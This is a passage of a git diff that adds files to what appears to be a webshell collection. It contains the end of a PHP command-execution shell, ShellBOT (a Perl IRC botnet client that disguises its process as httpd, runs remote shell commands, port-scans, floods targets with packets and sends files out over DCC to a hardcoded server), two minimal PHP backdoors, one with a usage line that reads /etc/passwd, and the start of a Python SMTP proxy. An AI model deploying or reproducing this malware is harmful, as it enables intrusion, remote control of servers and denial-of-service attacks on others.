+	 directory is the root directory (/). */
+      if (strlen($work_dir) == 1) {
+	/* work_dir is only 1 charecter - it can only be / There's no
+          parent directory then. */
+      } elseif (strrpos($work_dir, '/') == 0) {
+	/* The last / in work_dir were the first charecter.
+	   This means that we have a top-level directory
+	   eg. /bin or /home etc... */
+      echo "<option value=\"/\">Parent Directory</option>\n";
+      } else {
+      /* We do a little bit of string-manipulation to find the parent
+	 directory... Trust me - it works :-) */
+      echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n";
+      }
+    } else {
+      if ($work_dir == '/') {
+	echo "<option value=\"$work_dir$dir\">$dir</option>\n";
+      } else {
+	echo "<option value=\"$work_dir/$dir\">$dir</option>\n";
+      }
+    }
+  }
+}
+closedir($dir_handle);
+
+?>
+
+</select></p>
+
+<p>Command: <input type="text" name="command" size="60">
+<input name="submit_btn" type="submit" value="Execute Command"></p>
+
+<p>Enable <code>stderr</code>-trapping? <input type="checkbox" name="stderr"></p>
+<textarea cols="80" rows="20" readonly>
+
+<?php
+if (!empty($command)) {
+  if ($stderr) {
+    $tmpfile = tempnam('/tmp', 'phpshell');
+    $command .= " 1> $tmpfile 2>&1; " .
+    "cat $tmpfile; rm $tmpfile";
+  } else if ($command == 'ls') {
+    /* ls looks much better with ' -F', IMHO. */
+    $command .= ' -F';
+  }
+  system($command);
+}
+?>
+
+</textarea>
+</form>
+
+<script language="JavaScript" type="text/javascript">
+document.forms[0].command.focus();
+</script>
+
+<hr>
+
+</body>
+</html>
diff --git a/138shell/S/shellbot.pl.txt b/138shell/S/shellbot.pl.txt
new file mode 100644
index 0000000..28904a0
--- /dev/null
+++ b/138shell/S/shellbot.pl.txt
@@ -0,0 +1,704 @@
+#!/usr/bin/perl#
+###############################################################################################
+#  ShellBOT - PacktsGr0up                                                                     #                              #                    ____               _          _                                          #
+#                   |  _ \  __ _   ___ | | __ ___ | |_  ___                                   #
+#                   | |_) |/ _` | / __|| |/ // _ \| __|/ __|                                  #
+#                   |  __/| (_| || (__ |   <|  __/| |_ \__ \         m?e te amo!!                          #
+#                   |_|   _\__,_| \___||_|\_\\___| \__||___/                                  #
+#                        / ___| _ __  ___   _   _  _ __                                       #
+#                       | |  _ | '__|/ _ \ | | | || '_ \                                      #
+#                       | |_| || |  | (_) || |_| || |_) |                                     #
+#                        \____||_|   \___/  \__,_|| .__/                                      #
+#                                                 |_|                                         #
+#                                                                                             #
+#                Staff: Danilo                                                                #
+#                                                                                             #
+#adm: Danilo                                                                                  #
+###################################### CONFIGURACAO ###########################################
+my $processo = '/usr/local/apache/bin/httpd -DSSL';                       # Nome do processo que vai aparece no ps       #
+#----------------------------------------------################################################
+my $linas_max='5';                             # Evita o flood :) depois de X linhas          #
+#----------------------------------------------################################################
+my $sleep='10';                                 # ele dorme X segundos                         #
+########################################## IRC ################################################            
+my @adms=("NOD32"); # Nick do administrador                                                     #
+#----------------------------------------------################################################
+my @canais=("#SSH :2007");                 # Caso haja senha ("#hdr :hax0r")                      #
+#----------------------------------------------################################################
+my $nick='SSH-';	                       # Nick do bot. Caso esteja em uso vai aparecer #
+                                               # aparecer com numero radonamico no final      #
+#----------------------------------------------################################################
+my $ircname = 'SSH';                          # User ID                                        #
+#----------------------------------------------################################################
+chop (my $realname = `id`);                 # Full Name                                    #
+#----------------------------------------------################################################
+$servidor='208.98.16.20'  unless $servidor; # Servidor de irc que vai ser usado                #                                                                                  # caso n?o seja especificado no argumento  #                       #----------------------------------------------################################################
+my $porta='9001';                              # Porta do servidor de irc                     #
+################ ACESSO A SHELL ###############################################################
+my $secv = 1;	                               # 1/0 pra habilita/desabilita acesso a shell   #
+###############################################################################################
+
+my $VERSAO = '0.2';
+
+$SIG{'INT'} = 'IGNORE';
+$SIG{'HUP'} = 'IGNORE';
+$SIG{'TERM'} = 'IGNORE';
+$SIG{'CHLD'} = 'IGNORE';
+$SIG{'PS'} = 'IGNORE';
+
+use IO::Socket;
+use Socket;
+use IO::Select;
+chdir("/");
+$servidor="$ARGV[0]" if $ARGV[0];
+$0="$processo"."\0"x16;;
+my $pid=fork;
+exit if $pid;
+die "Problema com o fork: $!" unless defined($pid);
+
+
+
+our %irc_servers;
+our %DCC;
+my $dcc_sel = new IO::Select->new();
+
+########################################################################
+# Packets®Group CoRpOrAtIoN® - conquistaremos o mundo sem sair de casa!#
+########################################################################
+#BotNet Na Veia :P #
+####################
+
+$sel_cliente = IO::Select->new();
+sub sendraw {
+  if ($#_ == '1') {
+    my $socket = $_[0];
+    print $socket "$_[1]\n";
+  } else {
+      print $IRC_cur_socket "$_[0]\n";
+  }
+}
+
+sub conectar {
+   my $meunick = $_[0];
+   my $servidor_con = $_[1];
+   my $porta_con = $_[2];
+
+   my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
+   if (defined($IRC_socket)) {
+     $IRC_cur_socket = $IRC_socket;
+
+     $IRC_socket->autoflush(1);
+     $sel_cliente->add($IRC_socket);
+
+     $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
+     $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
+     $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+     $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
+     nick("$meunick");
+     sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
+     sleep 1;
+   }
+
+}
+my $line_temp;
+while( 1 ) {
+   while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
+   delete($irc_servers{''}) if (defined($irc_servers{''}));
+   &DCC::connections;
+   my @ready = $sel_cliente->can_read(0);
+   next unless(@ready);
+   foreach $fh (@ready) {
+     $IRC_cur_socket = $fh;
+     $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
+     $nread = sysread($fh, $msg, 4096);
+     if ($nread == 0) {
+        $sel_cliente->remove($fh);
+        $fh->close;
+        delete($irc_servers{$fh});
+     }
+     @lines = split (/\n/, $msg);
+
+     for(my $c=0; $c<= $#lines; $c++) {
+       $line = $lines[$c];
+       $line=$line_temp.$line if ($line_temp);
+       $line_temp='';
+       $line =~ s/\r$//;
+       unless ($c == $#lines) {
+         parse("$line");
+       } else {
+           if ($#lines == 0) {
+             parse("$line");
+           } elsif ($lines[$c] =~ /\r$/) {
+               parse("$line");
+           } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
+               parse("$line");
+           } else {
+               $line_temp = $line;
+           }
+       }
+      }
+   }
+}
+
+
+ 
+sub parse {
+   my $servarg = shift;
+   if ($servarg =~ /^PING \:(.*)/) {
+     sendraw("PONG :$1");
+   } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
+       my $pn=$1; my $onde = $4; my $args = $5;
+       if ($args =~ /^\001VERSION\001$/) {
+         notice("$pn", "\001VERSION ShellBOT-$VERSAO por 0ldW0lf\001");
+       }
+       if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
+         if ($onde eq "$meunick"){
+           shell("$pn", "$args");
+         }
+         if ($args =~ /^(\Q$meunick\E|\!nod)\s+(.*)/ ) {
+            my $natrix = $1;
+            my $arg = $2;
+            if ($arg =~ /^\!(.*)/) {
+              ircase("$pn","$onde","$1") unless ($natrix eq "!nod" and $arg =~ /^\!nick/);
+            } elsif ($arg =~ /^\@(.*)/) {
+                $ondep = $onde;
+                $ondep = $pn if $onde eq $meunick;
+                bfunc("$ondep","$1");
+            } else {
+                shell("$onde", "$arg");
+            }
+         } 
+       }
+   } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
+       if (lc($1) eq lc($meunick)) {
+         $meunick=$4; 
+         $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+       }
+   } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
+       nick("$meunick".int rand(9999));
+   } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
+       $meunick = $2;
+       $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+       $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
+       foreach my $canal (@canais) {
+         sendraw("JOIN $canal");
+       }
+   }
+}
+
+sub bfunc {
+  my $printl = $_[0];
+  my $funcarg = $_[1];
+  if (my $pid = fork) {
+     waitpid($pid, 0);
+  } else {
+      if (fork) {
+         exit;
+       } else {
+           if ($funcarg =~ /^portscan (.*)/) {
+             my $hostip="$1";
+             my @portas=("21","22","23","25","53","80","110","143");
+             my (@aberta, %porta_banner);
+             foreach my $porta (@portas)  {
+                my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
+                if ($scansock) {
+                   push (@aberta, $porta);
+                   $scansock->close;
+                }
+             }
+
+             if (@aberta) {
+               sendraw($IRC_cur_socket, "PRIVMSG $printl :portas abertas: @aberta");
+             } else {
+                 sendraw($IRC_cur_socket,"PRIVMSG $printl :Nenhuma porta aberta foi encontrada"); 
+             }
+           }
+           if ($funcarg =~ /^pacota\s+(.*)\s+(\d+)\s+(\d+)/) {
+             my ($dtime, %pacotes) = attacker("$1", "$2", "$3");
+             $dtime = 1 if $dtime == 0;
+             my %bytes;
+             $bytes{igmp} = $2 * $pacotes{igmp};
+             $bytes{icmp} = $2 * $pacotes{icmp};
+             $bytes{o} = $2 * $pacotes{o};
+             $bytes{udp} = $2 * $pacotes{udp};
+             $bytes{tcp} = $2 * $pacotes{tcp};
+            
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :\002 - Status GERAL -\002");
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Tempo\002: $dtime"."s");
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Total pacotes\002: ".($pacotes{udp} + $pacotes{igmp} + $pacotes{icmp} +  $pacotes{o}));
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Total bytes\002: ".($bytes{icmp} + $bytes {igmp} + $bytes{udp} + $bytes{o}));
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :\002M?dia de envio\002: ".int((($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)/$dtime)." kbps");
+
+
+           }
+           exit;
+       }
+  }
+}
+ 
+sub ircase {
+  my ($kem, $printl, $case) = @_;
+
+  if ($case =~ /^join (.*)/) {
+     j("$1");
+   } 
+   if ($case =~ /^part (.*)/) {
+      p("$1");
+   }
+   if ($case =~ /^rejoin\s+(.*)/) {
+      my $chan = $1;
+      if ($chan =~ /^(\d+) (.*)/) {
+        for (my $ca = 1; $ca <= $1; $ca++ ) {
+          p("$2");
+          j("$2");
+        }
+      } else {
+          p("$chan");
+          j("$chan");
+      }
+   }
+   if ($case =~ /^op/) {
+      op("$printl", "$kem") if $case eq "op";
+      my $oarg = substr($case, 3);
+      op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
+   }
+   if ($case =~ /^deop/) {
+      deop("$printl", "$kem") if $case eq "deop";
+      my $oarg = substr($case, 5);
+      deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
+   }
+   if ($case =~ /^voice/) {
+      voice("$printl", "$kem") if $case eq "voice";
+      $oarg = substr($case, 6);
+      voice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
+   }
+   if ($case =~ /^devoice/) {
+      devoice("$printl", "$kem") if $case eq "devoice";
+      $oarg = substr($case, 8);
+      devoice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
+   }
+   if ($case =~ /^msg\s+(\S+) (.*)/) {
+      msg("$1", "$2");
+   }
+   if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
+      for (my $cf = 1; $cf <= $1; $cf++) {
+        msg("$2", "$3");
+      }
+   }
+   if ($case =~ /^ctcp\s+(\S+) (.*)/) {
+      ctcp("$1", "$2");
+   }
+   if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
+      for (my $cf = 1; $cf <= $1; $cf++) {
+        ctcp("$2", "$3");
+      }
+   }
+   if ($case =~ /^invite\s+(\S+) (.*)/) {
+      invite("$1", "$2");
+   }
+   if ($case =~ /^nick (.*)/) {
+      nick("$1");
+   }
+   if ($case =~ /^conecta\s+(\S+)\s+(\S+)/) {
+       conectar("$2", "$1", 6667);
+   }
+   if ($case =~ /^send\s+(\S+)\s+(\S+)/) {
+      DCC::SEND("$1", "$2");
+   }
+   if ($case =~ /^raw (.*)/) {
+      sendraw("$1");
+   }
+   if ($case =~ /^eval (.*)/) {
+     eval "$1";
+   }
+}
+sub shell {
+  return unless $secv;
+  my $printl=$_[0];
+  my $comando=$_[1];
+  if ($comando =~ /cd (.*)/) {
+    chdir("$1") || msg("$printl", "Diert?? inexistente!");
+    return;
+  } 
+  elsif ($pid = fork) {
+     waitpid($pid, 0);
+  } else {
+      if (fork) {
+         exit;
+       } else {
+           my @resp=`$comando 2>&1 3>&1`;
+           my $c=0;
+           foreach my $linha (@resp) {
+             $c++;
+             chop $linha;
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
+             if ($c == "$linas_max") {
+               $c=0;
+               sleep $sleep;
+             }
+           }
+           exit;
+       }
+  }
+}
+
+#eu fiz um pacotadorzinhu e talz.. dai colokemo ele aki
+sub attacker {
+  my $iaddr = inet_aton($_[0]);
+  my $msg = 'B' x $_[1];
+  my $ftime = $_[2];
+  my $cp = 0;
+  my (%pacotes);
+  $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
+  
+  socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
+  socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
+  socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
+  socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
+  return(undef) if $cp == 4;
+  my $itime = time;
+  my ($cur_time);
+  while ( 1 ) {
+     for (my $porta = 1; $porta <= 65535; $porta++) {
+       $cur_time = time - $itime;
+       last if $cur_time >= $ftime;
+       send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
+       send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
+       send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
+       send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;
+
+       # DoS ?? :P
+       for (my $pc = 3; $pc <= 255;$pc++) {
+         next if $pc == 6;
+         $cur_time = time - $itime;
+         last if $cur_time >= $ftime;
+         socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
+         send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;;
+       }
+     }
+     last if $cur_time >= $ftime;
+  }
+  return($cur_time, %pacotes);
+}
+
+
+
+#############
+#  ALIASES  #
+#############
+
+sub action {
+   return unless $#_ == 1;
+   sendraw("PRIVMSG $_[0] :\001ACTION $_[1]\001");
+}
+
+sub ctcp {
+   return unless $#_ == 1;
+   sendraw("PRIVMSG $_[0] :\001$_[1]\001");
+}
+sub msg {
+   return unless $#_ == 1;
+   sendraw("PRIVMSG $_[0] :$_[1]");
+}  
+
+sub notice {
+   return unless $#_ == 1;
+   sendraw("NOTICE $_[0] :$_[1]");
+}
+
+sub op {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] +o $_[1]");
+}
+sub deop {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] -o $_[1]");
+}
+sub hop {
+    return unless $#_ == 1;
+   sendraw("MODE $_[0] +h $_[1]");
+}
+sub dehop {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] +h $_[1]");
+}
+sub voice {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] +v $_[1]");
+}
+sub devoice {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] -v $_[1]");
+}
+sub ban {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] +b $_[1]");
+}
+sub unban {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] -b $_[1]");
+}
+sub kick {
+   return unless $#_ == 1;
+   sendraw("KICK $_[0] $_[1] :$_[2]");
+}
+
+sub modo {
+   return unless $#_ == 0;
+   sendraw("MODE $_[0] $_[1]");
+}
+sub mode { modo(@_); }
+
+sub j { &join(@_); }
+sub join {
+   return unless $#_ == 0;
+   sendraw("JOIN $_[0]");
+}
+sub p { part(@_); }
+sub part {sendraw("PART $_[0]");}
+
+sub nick {
+  return unless $#_ == 0;
+  sendraw("NICK $_[0]");
+}
+
+sub invite {
+   return unless $#_ == 1;
+   sendraw("INVITE $_[1] $_[0]");
+}
+sub topico {
+   return unless $#_ == 1;
+   sendraw("TOPIC $_[0] $_[1]");
+}
+sub topic { topico(@_); }
+
+sub whois {
+  return unless $#_ == 0;
+  sendraw("WHOIS $_[0]");
+}
+sub who {
+  return unless $#_ == 0;
+  sendraw("WHO $_[0]");
+}
+sub names {
+  return unless $#_ == 0;
+  sendraw("NAMES $_[0]");
+}
+sub away {
+  sendraw("AWAY $_[0]");
+}
+sub back { away(); }
+sub quit {
+  sendraw("QUIT :$_[0]");
+}
+
+
+
+# DCC
+package DCC;
+
+sub connections {
+   my @ready = $dcc_sel->can_read(1);
+#   return unless (@ready);
+   foreach my $fh (@ready) {
+     my $dcctipo = $DCC{$fh}{tipo};
+     my $arquivo = $DCC{$fh}{arquivo};
+     my $bytes = $DCC{$fh}{bytes};
+     my $cur_byte = $DCC{$fh}{curbyte};
+     my $nick = $DCC{$fh}{nick};
+
+     my $msg;
+     my $nread = sysread($fh, $msg, 10240);
+
+     if ($nread == 0 and $dcctipo =~ /^(get|sendcon)$/) {
+        $DCC{$fh}{status} = "Cancelado";
+        $DCC{$fh}{ftime} = time;
+        $dcc_sel->remove($fh);
+        $fh->close;
+        next;
+     }
+
+     if ($dcctipo eq "get") {
+        $DCC{$fh}{curbyte} += length($msg);
+
+        my $cur_byte = $DCC{$fh}{curbyte};
+
+        open(FILE, ">> $arquivo");
+        print FILE "$msg" if ($cur_byte <= $bytes);
+        close(FILE);
+
+        my $packbyte = pack("N", $cur_byte);
+        print $fh "$packbyte";
+
+        if ($bytes == $cur_byte) {
+           $dcc_sel->remove($fh);
+           $fh->close;
+           $DCC{$fh}{status} = "Recebido";
+           $DCC{$fh}{ftime} = time;
+           next;
+        }
+     } elsif ($dcctipo eq "send") {
+          my $send = $fh->accept;
+          $send->autoflush(1);
+          $dcc_sel->add($send);
+          $dcc_sel->remove($fh);
+          $DCC{$send}{tipo} = 'sendcon';
+          $DCC{$send}{itime} = time;
+          $DCC{$send}{nick} = $nick;
+          $DCC{$send}{bytes} = $bytes;
+          $DCC{$send}{curbyte} = 0;
+          $DCC{$send}{arquivo} = $arquivo;
+          $DCC{$send}{ip} = $send->peerhost;
+          $DCC{$send}{porta} = $send->peerport;
+          $DCC{$send}{status} = "Enviando";
+
+          #de cara manda os primeiro 1024 bytes do arkivo.. o resto fik com o sendcon
+          open(FILE, "< $arquivo");
+          my $fbytes;
+          read(FILE, $fbytes, 1024);
+          print $send "$fbytes";
+          close FILE;
+#          delete($DCC{$fh});
+     } elsif ($dcctipo eq 'sendcon') {
+          my $bytes_sended = unpack("N", $msg);
+          $DCC{$fh}{curbyte} = $bytes_sended;
+          if ($bytes_sended == $bytes) {
+             $fh->close;
+             $dcc_sel->remove($fh);
+             $DCC{$fh}{status} = "Enviado";
+             $DCC{$fh}{ftime} = time;
+             next;
+          }
+          open(SENDFILE, "< $arquivo");
+          seek(SENDFILE, $bytes_sended, 0);
+          my $send_bytes;
+          read(SENDFILE, $send_bytes, 1024);
+          print $fh "$send_bytes";
+          close(SENDFILE);
+     }
+   }
+}
+
+
+sub SEND {
+  my ($nick, $arquivo) = @_;
+  unless (-r "$arquivo") {
+    return(0);
+  }
+ 
+  my $dccark = $arquivo;
+  $dccark =~ s/[.*\/](\S+)/$1/;
+
+  my $meuip = $::irc_servers{"$::IRC_cur_socket"}{'meuip'};
+  my $longip = unpack("N",inet_aton($meuip));
+
+  my @filestat = stat($arquivo);
+  my $size_total=$filestat[7];
+  if ($size_total == 0) {
+     return(0);
+  }
+
+  my ($porta, $sendsock);
+  do {
+    $porta = int rand(64511);
+    $porta += 1024;
+    $sendsock = IO::Socket::INET->new(Listen=>1, LocalPort =>$porta, Proto => 'tcp') and $dcc_sel->add($sendsock);
+  } until $sendsock;
+
+  $DCC{$sendsock}{tipo} = 'send';
+  $DCC{$sendsock}{nick} = $nick;
+  $DCC{$sendsock}{bytes} = $size_total;
+  $DCC{$sendsock}{arquivo} = $arquivo;
+
+
+  &::ctcp("$nick", "DCC SEND $dccark $longip $porta $size_total");
+
+}
+
+sub GET {
+  my ($arquivo, $dcclongip, $dccporta, $bytes, $nick) = @_;
+  return(0) if (-e "$arquivo");
+  if (open(FILE, "> $arquivo")) {
+     close FILE;
+  } else { 
+    return(0); 
+  }
+
+  my $dccip=fixaddr($dcclongip);
+  return(0) if ($dccporta < 1024 or not defined $dccip or $bytes < 1);
+  my $dccsock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$dccip, PeerPort=>$dccporta, Timeout=>15) or return (0);
+  $dccsock->autoflush(1);
+  $dcc_sel->add($dccsock);
+  $DCC{$dccsock}{tipo} = 'get';
+  $DCC{$dccsock}{itime} = time;
+  $DCC{$dccsock}{nick} = $nick;
+  $DCC{$dccsock}{bytes} = $bytes;
+  $DCC{$dccsock}{curbyte} = 0;
+  $DCC{$dccsock}{arquivo} = $arquivo;
+  $DCC{$dccsock}{ip} = $dccip;
+  $DCC{$dccsock}{porta} = $dccporta;
+  $DCC{$dccsock}{status} = "Recebendo";
+}
+
+# po fico xato de organiza o status.. dai fiz ele retorna o status de acordo com o socket.. dai o ADM.pl lista os sockets e faz as perguntas
+sub Status {
+  my $socket = shift;
+  my $sock_tipo = $DCC{$socket}{tipo};
+  unless (lc($sock_tipo) eq "chat") {
+    my $nick = $DCC{$socket}{nick};
+    my $arquivo = $DCC{$socket}{arquivo};
+    my $itime = $DCC{$socket}{itime};
+    my $ftime = time;
+    my $status = $DCC{$socket}{status};
+    $ftime = $DCC{$socket}{ftime} if defined($DCC{$socket}{ftime});
+
+    my $d_time = $ftime-$itime;
+
+    my $cur_byte = $DCC{$socket}{curbyte};
+    my $bytes_total =  $DCC{$socket}{bytes};
+
+    my $rate = 0;
+    $rate = ($cur_byte/1024)/$d_time if $cur_byte > 0;
+    my $porcen = ($cur_byte*100)/$bytes_total;
+
+    my ($r_duv, $p_duv);
+    if ($rate =~ /^(\d+)\.(\d)(\d)(\d)/) {
+       $r_duv = $3; $r_duv++ if $4 >= 5;
+       $rate = "$1\.$2"."$r_duv";
+    }
+    if ($porcen =~ /^(\d+)\.(\d)(\d)(\d)/) {
+       $p_duv = $3; $p_duv++ if $4 >= 5;
+       $porcen = "$1\.$2"."$p_duv";
+    }
+    return("$sock_tipo","$status","$nick","$arquivo","$bytes_total", "$cur_byte","$d_time", "$rate", "$porcen");
+  }
+
+
+  return(0);
+}
+
+
+# esse 'sub fixaddr' daki foi pego do NET::IRC::DCC identico soh copiei e coloei (colokar nome do autor)
+sub fixaddr {
+my ($address) = @_;
+
+    chomp $address;     # just in case, sigh.
+    if ($address =~ /^\d+$/) {
+        return inet_ntoa(pack "N", $address);
+    } elsif ($address =~ /^[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}$/) {
+        return $address;
+    } elsif ($address =~ tr/a-zA-Z//) {                    # Whee! Obfuscation!
+        return inet_ntoa(((gethostbyname($address))[4])[0]);
+    } elsif ($address =~ tr/a-zA-Z//) {                    # Whee! Obfuscation!
+        return inet_ntoa(((gethostbyname($address))[4])[0]);
+    } else {
+        return;
+    }
+}
+
+
+                                                                                                                     by Danilo
+
+
+
+ 
diff --git a/138shell/S/simple-backdoor.txt b/138shell/S/simple-backdoor.txt
new file mode 100644
index 0000000..bc0e778
--- /dev/null
+++ b/138shell/S/simple-backdoor.txt
@@ -0,0 +1,17 @@
+<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
+
+<?php
+
+if(isset($_REQUEST['cmd'])){
+        echo "<pre>";
+        $cmd = ($_REQUEST['cmd']);
+        system($cmd);
+        echo "</pre>";
+        die;
+}
+
+?>
+
+Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
+
+<!--    http://michaeldaw.org   2006    -->
diff --git a/138shell/S/simple_cmd.txt b/138shell/S/simple_cmd.txt
new file mode 100644
index 0000000..6416588
--- /dev/null
+++ b/138shell/S/simple_cmd.txt
@@ -0,0 +1,18 @@
+<html>
+<head>
+<title>G-Security Webshell</title>
+</head>
+
+<body bgcolor=#000000 text=#ffffff ">
+<form method=POST>
+<br>
+<input type=TEXT name="-cmd" size=64 value="<?=$cmd?>" 
+style="background:#000000;color:#ffffff;">
+<hr>
+<pre>
+<? $cmd = $_REQUEST["-cmd"];?>
+<? if($cmd != "") print Shell_Exec($cmd);?>
+</pre>
+</form>
+</body>
+</html
diff --git a/138shell/S/smtpd.py.txt b/138shell/S/smtpd.py.txt
new file mode 100644
index 0000000..7acf12b
--- /dev/null
+++ b/138shell/S/smtpd.py.txt
@@ -0,0 +1,549 @@
+#!/usr/local/bin/python
+"""An RFC 2821 smtp proxy.
+
+Usage: %(program)s [options] [localhost:localport [remotehost:remoteport]]
+
+Options:
+
+    --nosetuid
+    -n
+        This program generally tries to setuid `nobody', unless this flag is
+        set.  The setuid call will fail if this program is not run as root (in
+        which case, use this flag).
+
+    --version
+    -V
+        Print the version number and exit.
+
+    --class classname
+    -c classname
+        Use `classname' as the concrete SMTP proxy class.  Uses `PureProxy' by
+        default.
+
+    --debug
+    -d
+        Turn on debugging prints.
+
+    --help
+    -h
+        Print this message and exit.
+
+Version: %(__version__)s
+
+If localhost is not given then `localhost' is used, and if localport is not
+given then 8025 is used.  If remotehost is not given then `localhost' is used,
+and if remoteport is not given, then 25 is used.
+"""
+
+
+# Overview:
+#
+# This file implements the minimal SMTP protocol as defined in RFC 821.  It
+# has a hierarchy of classes which implement the backend functionality for the
+# smtpd.  A number of classes are provided:
+#
+#   SMTPServer - the base class for the backend.  Raises NotImplementedError
+#   if you try to use it.
+#
+#   DebuggingServer - simply prints each message it receives on stdout.
+#
+#   PureProxy - Proxies all messages to a real smtpd which does final
+#   delivery.  One known problem with this class is that it doesn't handle
+#   SMTP errors from the backend server at all.  This should be fixed
+#   (contributions are welcome!).
+#
+#   MailmanProxy - An experimental hack to work with GNU Mailman
+#   <www.list.org>.  Using this server as your real incoming smtpd, your
+#   mailhost will automatically recognize and accept mail destined to Mailman
+#   lists when those lists are created.  Every message not destined for a list
+#   gets forwarded to a real backend smtpd, as with PureProxy.  Again, errors
+#   are not handled correctly yet.
+#
+# Please note that this script requires Python 2.0
+#
+# Author: Barry Warsaw <barry@python.org>
+#
+# TODO:
+#
+# - support mailbox delivery
+# - alias files
+# - ESMTP
+# - handle error codes from the backend smtpd
+
+import sys
+import os
+import errno
+import getopt
+import time
+import socket
+import asyncore
+import asynchat
+
+__all__ = ["SMTPServer","DebuggingServer","PureProxy","MailmanProxy"]
+
+program = sys.argv[0]
+__version__ = 'Python SMTP proxy version 0.2'
+
+
+class Devnull:
+    def write(self, msg): pass
+    def flush(self): pass
+
+
+DEBUGSTREAM = Devnull()
+NEWLINE = '\n'
+EMPTYSTRING = ''
+COMMASPACE = ', '
+
+
+
+def usage(code, msg=''):
+    print >> sys.stderr, __doc__ % globals()
+    if msg:
+        print >> sys.stderr, msg
+    sys.exit(code)
+
+
+
+class SMTPChannel(asynchat.async_chat):
+    COMMAND = 0
+    DATA = 1
+
+    def __init__(self, server, conn, addr):
+        asynchat.async_chat.__init__(self, conn)
+        self.__server = server
+        self.__conn = conn
+        self.__addr = addr
+        self.__line = []
+        self.__state = self.COMMAND
+        self.__greeting = 0
+        self.__mailfrom = None
+        self.__rcpttos = []
+        self.__data = ''
+        self.__fqdn = socket.getfqdn()
+        self.__peer = conn.getpeername()
+        print >> DEBUGSTREAM, 'Peer:', repr(self.__peer)
+        self.push('220 %s %s' % (self.__fqdn, __version__))
+        self.set_terminator('\r\n')
+
+    # Overrides base class for convenience
+    def push(self, msg):
+        asynchat.async_chat.push(self, msg + '\r\n')
+
+    # Implementation of base class abstract method
+    def collect_incoming_data(self, data):
+        self.__line.append(data)
+
+    # Implementation of base class abstract method
+    def found_terminator(self):
+        line = EMPTYSTRING.join(self.__line)
+        print >> DEBUGSTREAM, 'Data:', repr(line)
+        self.__line = []
+        if self.__state == self.COMMAND:
+            if not line:
+                self.push('500 Error: bad syntax')
+                return
+            method = None
+            i = line.find(' ')
+            if i < 0:
+                command = line.upper()
+                arg = None
+            else:
+                command = line[:i].upper()
+                arg = line[i+1:].strip()
+            method = getattr(self, 'smtp_' + command, None)
+            if not method:
+                self.push('502 Error: command "%s" not implemented' % command)
+                return
+            method(arg)
+            return
+        else:
+            if self.__state != self.DATA:
+                self.push('451 Internal confusion')
+                return
+            # Remove extraneous carriage returns and de-transparency according
+            # to RFC 821, Section 4.5.2.
+            data = []
+            for text in line.split('\r\n'):
+                if text and text[0] == '.':
+                    data.append(text[1:])
+                else:
+                    data.append(text)
+            self.__data = NEWLINE.join(data)
+            status = self.__server.process_message(self.__peer,
+                                                   self.__mailfrom,
+                                                   self.__rcpttos,
+                                                   self.__data)
+            self.__rcpttos = []
+            self.__mailfrom = None
+            self.__state = self.COMMAND
+            self.set_terminator('\r\n')
+            if not status:
+                self.push('250 Ok')
+            else:
